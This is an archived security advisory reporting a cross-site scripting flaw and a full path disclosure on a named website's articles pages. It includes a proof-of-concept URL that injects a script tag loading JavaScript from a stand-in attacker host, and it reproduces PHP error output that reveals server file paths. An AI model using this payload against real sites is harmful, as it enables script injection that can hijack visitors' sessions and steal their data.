TUCoPS :: Web :: Specific Sites :: b06-2950.htm

Emllabs.com - XSS
Emllabs.com - XSS
Emllabs.com - XSS


Emllabs.com =0D
=0D
Effected files:=0D
=0D
articles.php=0D
=0D
search input box.=0D
=0D
The search input box doesnt properally filter user input. for PoC try putting in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]=0D 
=0D
XSS Vulnerability:=0D
=0D
http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] =0D 
=0D
 Full path disclosure error:=0D
=0D
http://previous.emllabs.com/article.php?articleId==0D 
=0D
Warning: main(_articles//article.php): failed to open stream: No such file or directory in /home/virtual/site479/fst/var/www/html/domain/article.php on line 53=0D
=0D
Warning: main(_articles//article.php): failed to open stream: No such file or directory in /home/virtual/site479/fst/var/www/html/domain/article.php on line 53=0D
=0D
Warning: main(): Failed opening '_articles//article.php' for inclusion (include_path='.:/php/includes:/usr/share/php:/usr/share/pear') in /home/virtual/site479/fst/var/www/html/domain/article.php on line 53

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH